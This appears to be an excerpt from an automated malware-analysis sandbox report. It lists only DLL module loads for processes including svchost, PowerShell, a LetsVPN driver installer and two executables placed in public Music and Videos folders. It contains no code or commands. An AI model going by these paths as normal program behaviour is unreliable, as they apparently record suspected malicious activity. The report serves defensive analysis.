                Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: moshost.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mapsbtsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mosstorage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ztrace_maps.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mapconfiguration.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: aphostservice.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: networkhelper.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: storsvc.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: fltlib.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: bcd.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: storageusage.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: opengl32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: libcef.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: msimg32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oledlg.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: glu32.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: ulib.dllJump to behavior
                Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: dwmapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: oleacc.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: shfolder.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: riched20.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: usp10.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: msls31.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: textinputframework.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coreuicomponents.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: coremessaging.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: linkinfo.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: ntshrui.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: cscapi.dllJump to behavior
                Source: C:\Users\Public\Videos\bin.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oleacc.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: opengl32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: version.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: libcef.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iphlpapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wininet.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: urlmon.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: glu32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: msimg32.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: uxtheme.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: oledlg.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winmm.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: iertutil.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: srvcli.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: netutils.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: mswsock.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: napinsp.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: pnrpnsp.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: wshbth.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: nlaapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: dnsapi.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: winrnr.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: fwpuclnt.dll
                Source: C:\Users\Public\Music\20250413054815\Agghosts.exeSection loaded: rasadhlp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: apphelp.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devrtl.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: spinf.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: drvstore.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: newdev.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: msasn1.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptsp.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: rsaenh.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cryptbase.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: gpapi.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: cabinet.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpnpmgr.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: msasn1.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cryptsp.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: rsaenh.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cryptbase.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: gpapi.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: ntmarta.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: drvstore.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: devobj.dll
                Source: C:\Windows\System32\drvinst.exeSection loaded: cabinet.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupsvc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupapi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: netsetupengine.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: implatsetup.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: devrtl.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: spinf.dll
                Source: C:\Windows\System32\svchost.exeSection loaded: drvstore.dll
                Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeSection loaded: devobj.dll
